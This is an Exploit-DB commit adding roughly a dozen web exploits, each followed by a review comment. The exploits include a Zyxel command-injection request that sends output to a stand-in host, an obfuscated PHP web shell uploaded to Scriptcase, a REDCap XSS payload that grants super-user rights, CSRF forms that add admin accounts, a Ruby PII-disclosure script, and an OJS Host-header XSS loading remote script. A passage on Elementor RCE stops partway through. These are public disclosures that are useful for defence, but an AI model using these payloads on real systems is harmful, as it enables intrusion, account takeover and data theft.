DB: 2022-04-20

21 changes to exploits/shellcodes

Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path
Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path
7-zip - Code Execution / Local Privilege Escalation
PTPublisher v2.3.4 - Unquoted Service Path
EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path
Zyxel NWA-1100-NH - Command Injection
ManageEngine ADSelfService Plus 6.1 - User Enumeration
Verizon 4G LTE Network Extender - Weak Credentials Algorithm
Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure

Scriptcase 9.7 - Remote Code Execution (RCE)
WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection
Easy Appointments 1.4.2 - Information Disclosure
WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)
WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated)
REDCap 11.3.9 - Stored Cross Site Scripting
PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)
This commit is contained in:
Offensive Security 2022-04-20 05:01:45 +00:00
parent 6457d1796d
commit 093714dc70
22 changed files with 906 additions and 1 deletions

View file

@ -0,0 +1,28 @@
# Exploit Title: Zyxel NWA-1100-NH - Command Injection
# Date: 12/4/2022
# Exploit Author: Ahmed Alroky
# Vendor Homepage: https://www.zyxel.com/homepage.shtml
# Version: ALL BEFORE 2.12
# Tested on: Linux
# CVE : CVE-2021-4039
# References : https://download.zyxel.com/NWA1100-NH/firmware/NWA1100-NH_2.12(AASI.3)C0_2.pdf ,
https://www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml
HTTP Request :
POST /login/login.html HTTP/1.1
Host: IP_address:8081
Content-Length: 80
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http:/IP_address:8081
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://IP_address:8081/login/login.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
myname=ffUfRAgO%60id%7ctelnet%20yourserverhere%2021%60&mypasswd=test&Submit=Login
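Review bot: the References continuation on the second line (`https://www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml`) lacks the leading `#`, so the header block is no longer uniformly commented; put the second URL on its own `# References :` line. Two smaller header issues: `Origin: http:/IP_address:8081` is missing a slash, and `Date: 12/4/2022` is ambiguous where the other entries in this batch use ISO dates. Since the vendor advisory and the 2.12 firmware PDF are already cited, the header should state plainly that 2.12 is the fixed release instead of `Version: ALL BEFORE 2.12`, which is the detail a defender checking patch status needs.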

View file

@ -0,0 +1,67 @@
Exploit Title: Verizon 4G LTE Network Extender - Weak Credentials Algorithm
Exploit Author: LiquidWorm
Vendor: Verizon Communications Inc.
Product web page: https://www.verizon.com
Affected version: GA4.38 - V0.4.038.2131
Summary: An LTE Network Extender enhances your indoor and 4G
LTE data and voice coverage to provide better service for your
4G LTE mobile devices. It's an extension of our 4G LTE network
that's placed directly in your home or office. The LTE Network
Extender works with all Verizon-sold 4G LTE mobile devices for
4G LTE data service and HD Voice-capable 4G LTE devices for voice
service. This easy-to-install device operates like a miniature
cell tower that plugs into your existing high-speed broadband
connection to communicate with the Verizon wireless network.
Desc: Verizon's 4G LTE Network Extender is utilising a weak
default admin password generation algorithm. The password is
generated using the last 4 values from device's MAC address
which is disclosed on the main webUI login page to an unauthenticated
attacker. The values are then concatenated with the string
'LTEFemto' resulting in something like 'LTEFemtoD080' as the
default Admin password.
Tested on: lighttpd-web
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5701
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5701.php
17.02.2022
--
snippet:///Exploit
//
// Verizon 4G LTE Network Extender Super Awesome JS Exploit
//
console.log("Calling 'isDefaultPassword' API");
let req = new Request("/webapi/isDefaultPassword");
let def = req.url;
const doAjax = async () => {
const resp = await fetch(def);
if (resp.ok) {
const jsonyo = await resp.json();
return Promise.resolve(jsonyo);
} else {
return Promise.reject("Smth not rite captain!");
}
}
doAjax().then(console.log).catch(console.log);
await new Promise(t => setTimeout(t, 1337));
console.log("Verizon Admin Password: ");
let mac = document.querySelector("#mac_address").innerHTML;
console.log("LTEFemto" + mac.substr(-4));
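Review bot: `doAjax().then(console.log).catch(console.log);` is never awaited, so the snippet relies on the arbitrary `await new Promise(t => setTimeout(t, 1337));` for ordering; `const result = await doAjax();` would make the sequence deterministic and remove the sleep. The top-level `await` also means the code only runs in a browser console or a module, which `Tested on: lighttpd-web` does not convey; say where it is meant to be pasted. `mac.substr(-4)` uses the deprecated `substr`; `mac.slice(-4)` is the current equivalent. The `Request` object is created only to read back its own `url`, so `def` can simply be the path string. The Desc already contains the finding that matters for defenders (the default password is derived from the MAC shown on the unauthenticated login page); a mitigation line (change the default admin password, hide the MAC from the login page) belongs next to it.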

View file

@ -0,0 +1,78 @@
# Exploit Tile: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
# Exploit Author: LiquidWorm
<!DOCTYPE html>
<html>
<head><title>enteliTouch CSRF</title></head>
<body>
<!--
Delta Controls enteliTOUCH 3.40.3935 Cross-Site Request Forgery (CSRF)
Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
3.40.3706
3.33.4005
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: DELTA enteliTOUCH
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5702
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5702.php
06.04.2022
-->
CSRF Add User:
<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Add&userName=&userPassword=" method="POST">
<input type="hidden" name="actionName" value="" />
<input type="hidden" name="Username" value="zsl" />
<input type="hidden" name="Password" value="123t00t" />
<input type="hidden" name="AutoLogout" value="17" />
<input type="hidden" name="SS&#95;SelectedOptionId" value="FIL28" />
<input type="hidden" name="ObjRef" value="" />
<input type="hidden" name="Apply" value="true" />
<input type="hidden" name="formAction" value="Add" />
<input type="submit" value="Go for UserAdd" />
</form>
<br />
CSRF Change Admin Password (default: delta:login):
<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Edit&userName=DELTA&userPassword=baaah" method="POST">
<input type="hidden" name="actionName" value="" />
<input type="hidden" name="Username" value="DELTA" />
<input type="hidden" name="Password" value="123456" />
<input type="hidden" name="AutoLogout" value="30" />
<input type="hidden" name="SS&#95;SelectedOptionId" value="" />
<input type="hidden" name="ObjRef" value="ZSL-251" />
<input type="hidden" name="Apply" value="true" />
<input type="hidden" name="formAction" value="Edit" />
<input type="submit" value="Go for UserEdit" />
</form>
</body>
</html>
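Review bot: `# Exploit Tile:` on the first line is a typo for `# Exploit Title:`, and the header has no `# Date`, `# Version` or `# Tested on` lines even though the advisory comment inside the HTML carries all three; the parser-facing header should repeat them. In the second form the action URL carries `userName=DELTA&userPassword=baaah` while the body posts `Password=123456`, so it is unclear which value the application applies; the PoC should use one password and say so. `Tested on: DELTA enteliTOUCH` repeats the product name rather than a firmware build; the three affected versions listed above it would be the useful value. The `192.168.0.210` host is hard-coded in both `action` attributes and should be a `[TARGET]` placeholder.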

View file

@ -0,0 +1,56 @@
# Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
# Exploit Author: LiquidWorm
<!DOCTYPE html>
<html>
<head><title>enteliTouch XSS</title></head>
<body>
<!--
Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS)
Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
3.40.3706
3.33.4005
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.
Desc: Input passed to the POST parameter 'Username' is not properly
sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML code in a user's browser session in context
of an affected site.
Tested on: DELTA enteliTOUCH
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5703
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5703.php
06.04.2022
-->
<form action="http://192.168.0.210/deltaweb/hmi_userconfig.asp" method="POST">
<input type="hidden" name="userInfo" value="" />
<input type="hidden" name="UL&#95;SelectedOptionId" value="" />
<input type="hidden" name="Username" value=""><&#47;script><script>alert&#40;document&#46;cookie&#41;<&#47;script>" />
<input type="hidden" name="formAction" value="Delete" />
<input type="submit" value="CSRF XSS Alert!" />
</form>
</body>
</html>
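Review bot: the `Username` input mixes a raw `"` with entity-encoded characters (`<&#47;script>`, `&#40;`), so as written the attribute value closes at the first quote and the remainder is parsed as stray attribute text; the advisory should say whether that is a typo or an intentional attribute break-out. The form submits `formAction=Delete` to `hmi_userconfig.asp`, a destructive action, yet the Desc only mentions the `Username` parameter being returned to the user; a reader cannot tell whether the XSS is reflected or stored, nor whether a deletion is triggered as a side effect, and both matter for impact. As with the companion CSRF file, the `# Date`, `# Version` and `# Tested on` header lines are missing and the host is hard-coded.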

View file

@ -0,0 +1,48 @@
Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure
Exploit Author: LiquidWorm
Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
3.40.3706
3.33.4005
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.
Desc: The application suffers from a cleartext transmission/storage
of sensitive information in a Cookie. This allows a remote
attacker to intercept the HTTP Cookie authentication credentials
through a man-in-the-middle attack.
Tested on: DELTA enteliTOUCH
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5704
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5704.php
06.04.2022
--
GET /deltaweb/hmi_useredit.asp?ObjRef=BAC.1000.ZSL3&formAction=Edit HTTP/1.1
Host: 192.168.0.210
Cache-Control: max-age=0
User-Agent: Toucher/1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.210/deltaweb/hmi_userconfig.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Previous=; lastLoaded=; LastUser=DELTA; LogoutTime=10; UserInstance=1; UserName=DELTA; Password=LOGIN; LastGraphic=; LastObjRef=; AccessKey=DADGGEOFNILEJMBBCNDKFNJPHPPJDAEDGEBJACPEAPBHDCGPCAGNNDEOJIJEOPPLOEKCFMAFNHDJPHGACMDFMPFDNONPIJAHBBNAAIDMDHCCPMAJDELDNLOPBPDCKELJADDKICPMMPCNEOMBHMKIIBJHFAJKNKJFGDEOLPMGMNBEHFLNEDIFMJKMCJKBHPGGEMHJJGMOMAECDKDIIKGNDDGANIHDKPNACLMANGJAOBDNJCFGEIHIJICLPGOFFMDOOLOJCJPAPPKOJFCKFAHDDAGNLCAHKKKGHCBODHBNDCOECGHG
Connection: close
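Review bot: the `Cookie:` header reproduces `UserName=DELTA; Password=LOGIN` together with a long `AccessKey=` value; if `AccessKey` is a session or authentication token it should be redacted to a placeholder, and if it is derived from the password the description should say so, because that would be the more serious finding. The Desc claims both 'transmission' and 'storage' of cleartext credentials, but the request only shows transmission; the storage half needs a sentence on where the cookie is persisted. A mitigation line (do not carry credentials in cookies, set `HttpOnly` and `Secure`, serve the interface over HTTPS) belongs in the advisory, and `Tested on: DELTA enteliTOUCH` should be a version. This file also drops the `#` comment prefix used by the other headers in this batch.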

View file

@ -2,7 +2,6 @@
# Date: 11/11/2021
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://apache.org/
# Software Link: https://github.com/Balgogan/CVE-2021-41773
# Version: Apache 2.4.49/2.4.50 (CGI enabled)
# Tested on: Debian GNU/Linux
# CVE : CVE-2021-41773 / CVE-2021-42013
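Review bot: this hunk (`@ -2,7 +2,6 @@`) is the single deletion counted in `22 changed files with 906 additions and 1 deletions`, but the rendered view shows only the seven surviving header lines of the existing CVE-2021-41773 entry, so the removed line cannot be identified from this page, and the commit message (`21 changes to exploits/shellcodes`) lists only the new entries. Edits to existing exploits should be named in the commit message (which header field was removed and why) so the change is reviewable.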

View file

@ -0,0 +1,35 @@
# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection
# Date: 2022-04-11
# Exploit Author: Mohsen Dehghani (aka 0xProfessional)
# Vendor Homepage: https://motopress.com/
# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip
# Version: 4.2.4
# Tested on: Windows/XAMPP
###########################################################################
PoC:
Vulnerable File:sync-urls-repository.php
public function insertUrls($roomId, $urls)
{
global $wpdb;
if (empty($urls)) {
return;
}
$urls = $this->prepareUrls($urls);
$values = array();
foreach ($urls as $syncId => $url) {
$values[] = $wpdb->prepare("(%d, %s, %s)", $roomId, $syncId, $url);
}
$sql = "INSERT INTO {$this->tableName} (room_id, sync_id, calendar_url)"
. " VALUES " . implode(', ', $values);
$wpdb->query($sql);
Vulnerable Parameter:
room_id=SQL Injection
sync_id=SQL Injection
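Review bot: the quoted `insertUrls()` code does not demonstrate the injection claimed under `Vulnerable Parameter:`: each row is built with `$wpdb->prepare("(%d, %s, %s)", $roomId, $syncId, $url)`, which casts `room_id` to an integer and quotes and escapes `sync_id` and `calendar_url`, and the only interpolated value is `{$this->tableName}`, which is not user-controlled in the snippet shown. The PoC needs the request (endpoint, parameters, a minimal payload) by which attacker-controlled input reaches this function, or the path by which `prepareUrls()` undoes the escaping; without that a defender cannot confirm the finding or write a detection. `# Tested on: Windows/XAMPP` should also name the WordPress and PHP versions, and there is no CVE or vendor advisory reference.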

81
exploits/php/webapps/50871.rb Executable file
View file

@ -0,0 +1,81 @@
# Exploit Title: Easy Appointments 1.4.2 - Information Disclosure
# Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
# Author website: https://pwn.by/noraj/
# Exploit source: https://github.com/Acceis/exploit-CVE-2022-0482
# Date: 2022-04-11
# Vendor Homepage: https://easyappointments.org/
# Software Link: https://github.com/alextselegidis/easyappointments/archive/refs/tags/1.4.2.tar.gz
# Version: < 1.4.3 (it means up to 1.4.2)
# Tested on: Easy!Appointments Version 1.3.2
# Vulnerability
## Discoverer: Francesco CARLUCCI
## Date: 2022-01-30
## Discoverer website: https://carluc.ci/
## Discovered on OpenNetAdmin 1.4.2
## Title: Exposure of Private Personal Information to an Unauthorized Actor in alextselegidis/easyappointments
## CVE: CVE-2022-0482
## CWE: CWE-863
## Patch: https://github.com/alextselegidis/easyappointments/commit/bb71c9773627dace180d862f2e258a20df84f887#diff-4c48e5652fb13f13d2a50b6fb5d7027321913c4f8775bb6d1e8f79492bdd796c
## References:
## - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/
## - https://github.com/alextselegidis/easyappointments/tree/1.4.2
## - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-0482.yaml
## - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/
## - https://nvd.nist.gov/vuln/detail/CVE-2022-0482
#!/usr/bin/env ruby
require 'date'
require 'httpx'
require 'docopt'
doc = <<~DOCOPT
Easy!Appointments < 1.4.3 - Unauthenticated PII (events) disclosure
Source: https://github.com/Acceis/exploit-CVE-2022-0482
Usage:
#{__FILE__} <url> [<startDate> <endDate>] [--debug]
#{__FILE__} -h | --help
Options:
<url> Root URL (base path) including HTTP scheme, port and root folder
<startDate> All events since (default: 2015-01-11)
<endDate> All events until (default: today)
--debug Display arguments
-h, --help Show this screen
Examples:
#{__FILE__} http://10.0.0.1
#{__FILE__} https://10.0.0.1:4567/subdir 2022-04-01 2022-04-30
DOCOPT
def fetch_csrf(root_url, http)
vuln_url = "#{root_url}/index.php"
http.get(vuln_url)
end
def exploit(root_url, startDate, endDate, http)
vuln_url = "#{root_url}/index.php/backend_api/ajax_get_calendar_events"
params = {
'csrfToken' => http.cookies.first.value, # csrfCookie
'startDate' => startDate.nil? ? '2015-01-11' : startDate,
'endDate' => endDate.nil? ? Date.today.to_s : endDate
}
http.post(vuln_url, form: params)
end
begin
args = Docopt.docopt(doc)
pp args if args['--debug']
http = HTTPX.plugin(:cookies)
fetch_csrf(args['<url>'], http)
puts exploit(args['<url>'], args['<startDate>'], args['<endDate>'], http).body
rescue Docopt::Exit => e
puts e.message
end
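Review bot: `## Discovered on OpenNetAdmin 1.4.2` looks like a copy-paste leftover from a different advisory; the product here is Easy!Appointments. `# Tested on: Easy!Appointments Version 1.3.2` is also inconsistent with `# Version: < 1.4.3`, so the header should state the version actually tested. The `#!/usr/bin/env ruby` shebang sits after the comment block rather than on line 1, so the file is not directly executable despite being committed as `Executable file`. In `exploit()`, `http.cookies.first.value` assumes the CSRF cookie is the first cookie set by `index.php`, which the comment `# csrfCookie` acknowledges but does not verify. The `## Patch:` commit link is the most useful item for defenders and deserves a mention in the summary line.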

View file

@ -0,0 +1,47 @@
# Exploit Title: Scriptcasr 9.7 arbitrary file upload getshell
# Date: 2022-04-08
# Exploit Author: luckyt0mat0
# Vendor Homepage: https://www.scriptcase.net/
# Software Link: https://www.scriptcase.net/download/
# Version: 9.7
# Tested on: Windows Server 2019
# Proof of Concept:
POST /scriptcase/devel/lib/third/jquery_plugin/jQuery-File-Upload/server/php/ HTTP/1.1
Host: 10.50.1.214:8091
Content-Length: 570
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Origin: http://10.50.1.214:8091
Referer: http://10.50.1.214:8091/scriptcase/devel/iface/app_template.php?randjs=MYxlp4xwCiIQBjy
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sales1.scriptcase-_zldp=%2Blf8JBkbzCTGvnrypkRAEoy1%2BVW%2BpJL8Vv42yN%2FS02hog7eXhi2oz9sY2rJ5JXybCaUbPUvRWVc%3D; sales1.scriptcase-_zldt=6206f2cd-57fd-4e1d-99a8-b9a27c7b3421-2; PHPSESSID=be1281e8cde9348d284c3074c9bea53e; sc_actual_lang_samples=en_us
Connection: close
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="jqul_csrf_token"
gZiFUw6nNw84D4euS8RJ3AQLz0o3Bo1Q24Kq1ufcJA8FjRCIeohe0gBZ34hXIW7M
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="files[]"; filename="123.php"
Content-Type: text/html
<?php
error_reporting(0);
$a = rad2deg^(3).(2);
$b = asin^(2).(6);
$c = ceil^(1).(1);
$exp = $a.$b.$c; //assert
$pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET
$pi=$$pi; //$_GET
call_user_func($exp,$pi{0}($pi{1}));
?>
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ———
# Notes:
- PHPSESSID is - be1281e8cde9348d284c3074c9bea53e
- Upload path is - http://x.x.x.:8091/scriptcase/tmp/sc_tmp_upload_{{PHPSESSID}}/123.php
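Review bot: the title in this file (`Scriptcasr 9.7 arbitrary file upload getshell`) has a typo and does not match the entry in the commit message (`Scriptcase 9.7 - Remote Code Execution (RCE)`); the request carries a `PHPSESSID` cookie and a `jqul_csrf_token`, so the title should also mark the issue as authenticated. The closing multipart boundary on the last request line ends in `———` (em-dashes) instead of `--`, so the body as pasted is not a valid multipart message. The session id and CSRF token are live values and should be placeholders, and `http://x.x.x.:8091` in the notes is a malformed placeholder. The PHP written to `123.php` is an obfuscated `assert`/`$_GET` web shell (the inline comments say as much); the notes should state that plainly and point defenders at `scriptcase/tmp/sc_tmp_upload_*/` as the location to monitor for unexpected `.php` files.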

View file

@ -0,0 +1,27 @@
# Exploit Title: WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/
# Date: 2022-04-13
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: http://www.a-j-evolution.com/
# Software Link: https://downloads.wordpress.org/plugin/video-synchro-pdf.1.7.4.zip
# Category: Web Application
# Version: 1.7.4
# Tested on: CentOS / WordPress 5.9.3
# CVE : N/A
# 1. Technical Description:
The plugin does not properly sanitize the nom, pdf, mp4, webm and ogg parameters, allowing
potentially dangerous characters to be inserted. This includes the reported payload, which
triggers a persistent Cross-Site Scripting (XSS).
# 2. Proof of Concept (PoC):
a. Install and activate version 1.7.4 of the plugin.
b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=aje_videosyncropdf_videos).
c. Open the "Video example" or create a new one (whichever you prefer).
d. Change or add in some of the displayed fields (Name, PDF file, MP4 video, WebM video or OGG video)
the following payload:
" autofocus onfocus=alert(/XSS/)>.
e. Save the changes. "Edit" button.
f. JavaScript will be executed and a popup with the text "XSS" will be displayed.
Note: This change will be permanent until you modify the edited field.
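Review bot: step b opens `wp-admin/admin.php?page=aje_videosyncropdf_videos`, so the issue requires an administrator (or equivalent) session, yet the title says only 'Stored Cross Site Scripting (XSS)'; mark it '(Authenticated)' and name the minimum role, as the Popup Maker entry in this batch does. The payload line `" autofocus onfocus=alert(/XSS/)>.` ends with a period that reads as part of the payload; move it outside or put the payload on its own line. Step e, `Save the changes. "Edit" button.`, should read `Save the changes with the "Edit" button.` `# CVE : N/A` with no vendor reference means defenders cannot tell whether a fixed version exists.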

View file

@ -0,0 +1,23 @@
# Exploit Title: WordPress Plugin Popup Maker <1.16.5 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2022-03-03
# Exploit Author: Roel van Beurden
# Vendor Homepage: https://wppopupmaker.com
# Software Link: https://downloads.wordpress.org/plugin/popup-maker.1.16.4.zip
# Version: <1.16.5
# Tested on: WordPress 5.9 on Ubuntu 20.04
1. Description:
----------------------
WordPress Plugin Popup Maker <1.16.5 does not sanitise and escape some of its popup settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
2. Proof of Concept:
----------------------
Create Popup > Popup Settings > Triggers > Add New Cookie > Add > Cookie Time (overwrite the default '1 month' with XSS payload)
Click 'Add' what triggers the XSS payload
Payload examples:
<script>alert('XSS');</script>
<img src=x onerror=alert('XSS')>
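Review bot: the file header says `# Version: <1.16.5` and the software link is the 1.16.4 zip, so 1.16.5 is the fixed release, but the commit message lists this entry as `Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated)`, which reads as if 1.16.5 were vulnerable; the two should agree. `Click 'Add' what triggers the XSS payload` should be `Clicking 'Add' triggers the XSS payload`. The description's point that the XSS fires even when `unfiltered_html` is disallowed is the security-relevant one; a changelog or CVE reference for the fix in 1.16.5 would let defenders verify it.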

View file

@ -0,0 +1,44 @@
# Exploit Title: REDCap 11.3.9 - Stored Cross-Site Scripting
# Date: 2021-10-11
# Exploit Author: Kendrick Lam
# References: https://github.com/KCL04/XSS-PoCs/blob/main/CVE-2021-42136.js
# Vendor Homepage: https://projectredcap.org
# Software Link: https://projectredcap.org
# Version: Redcap before 11.4.0
# Tested on: 11.2.5
# CVE: CVE-2021-42136
# Security advisory: https://redcap.med.usc.edu/_shib/assets/ChangeLog_Standard.pdf
### Stored XSS Missing Data Code Value (found by Kendrick Lam)
It was possible to store JavaScript as values for Missing Data Codes.
- Where: Missing Data Code.
- Payload:
<script>
var target = document.location.host;
var csrf_token = csrf_token;
var userId = '<userId>'; // Replace with your user ID.
function privesc()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://" + target + "/index.php?route=ControlCenterController:saveNewAdminPriv", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.setRequestHeader("Sec-Fetch-Dest", "empty");
xhr.withCredentials = "true";
var body = "";
body += "userid=" + userId + "&attrs=admin_rights%2Csuper_user%2Caccount_manager%2Caccess_system_config%2Caccess_system_upgrade%2Caccess_external_module_install%2Caccess_admin_dashboards&csrf_token=" + csrf_token;
xhr.send(body);
return true;
}
privesc();
</script>
- Details: The payload will escalate a regular user's privileges, if viewed by an account with permission to change privileges (such as an administrator).
- Privileges: Low privileged / regular user
- Location example: https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX
- Privileges:
+ Store: Low privileged user is able to store Missing Data Code values.
+ Execute: Any authenticated user. The payload will trigger once the page loads, this means storing the payload and sending over the link to an administrator would be able to escalate the user's privileges. For example, by browsing to https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX
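Review bot: `var csrf_token = csrf_token;` is a self-assignment that only works when the page already defines a global `csrf_token` with `var`; inside a function scope it yields `undefined`, and if the page declares it with `let` or `const` it is a redeclaration error. `xhr.withCredentials = "true"` passes a string where a boolean is expected (truthy, so it works, but misleading). The `- Privileges:` field appears twice with different content (`- Privileges: Low privileged / regular user` and the later `- Privileges:` list), and `# Tested on: 11.2.5` does not match the `11.3.9` in the title; the header should state which build the PoC was run against and that 11.4.0 is the fix, as `# Version: Redcap before 11.4.0` implies.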

View file

@ -0,0 +1,18 @@
# Exploit Title: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
# Date: 31/01/2022
# Exploit Author: Hemant Kashyap
# Vendor Homepage: https://github.com/pkp/pkp-lib/issues/7649
# Version: PKP Open Journals System 2.4.8 >= 3.3
# Tested on: All OS
# CVE : CVE-2022-24181
# References: https://youtu.be/v8-9evO2oVg
XSS via Host Header injection and Steal Password Reset Token of another user Step to reproduce:
1) Go to this site: https://who's-using-ojs-software.com
2) And capture this request in burp , and send to repeater.
3) Add this after Host Header X-Forwarded-Host: foo"><script src=//dtf.pw/2.js></script><x=".com
4) And this click on send , after this right click on request and click on show response in browser , after this copy the request.
5) Paste this request in browser , and you'll see xss pop-up. Mitigation: Update to newer version.
This vulnerability in PKP vendor software Open-journal-system version 2.4.8 to 3.3.8 all are vulnerable to xss via Host Header injection and steal password reset token vulnerability
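Review bot: `# Vendor Homepage` points at a GitHub issue (`pkp/pkp-lib/issues/7649`), which belongs under `# References`; the vendor homepage should be the PKP site. `# Version: PKP Open Journals System 2.4.8 >= 3.3` is not a readable range; the last paragraph says `2.4.8 to 3.3.8`, so use that. `# Tested on: All OS` is not a test environment. In the steps, `https://who's-using-ojs-software.com` and the script source `//dtf.pw/2.js` are author-specific values and should be `[TARGET]` and `[ATTACKER]` placeholders. The mitigation `Update to newer version` should name the fixed release, and steps 2 to 5 are run-on sentences that should be split into one action each.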

118
exploits/php/webapps/50882.py Executable file
View file

@ -0,0 +1,118 @@
# Exploit Title: WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/16/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://elementor.com/
# Software Link: https://wordpress.org/plugins/elementor/advanced/ (scroll down to select the version)
# Version: 3.6.0, 3.6.1, 3.62
# Tested on: WordPress 5.9.3 (os-independent since this exploit does NOT provide the payload)
#!/usr/bin/python
import requests
import re
# WARNING: This exploit does NOT include the payload.
# Also, be sure you already have some valid credentials. This exploit needs an account in order to work.
# # # # # VULNERABILITY DESCRIPTION # # # # #
# The WordPress plugin called Elementor (v. 3.6.0, 3.6.1, 3.6.2) has a vulnerability that allows any authenticated user to upload and execute any PHP file.
# This vulnerability, in the OWASP TOP 10 2021, is placed in position #1 (Broken Access Control)
# The file that contains this vulnerability is elementor/core/app/modules/onboarding/module.php
#
# At the end of this file you can find this code:
# add_action( 'admin_init', function() {
# if ( wp_doing_ajax() &&
# isset( $_POST['action'] ) &&
# isset( $_POST['_nonce'] ) &&
# wp_verify_nonce( $_POST['_nonce'], Ajax::NONCE_KEY )
# ) {
# $this->maybe_handle_ajax();
# }
# } );
#
# This code is triggered whenever ANY user account visits /wp-admin
# In order to work we need the following 4 things:
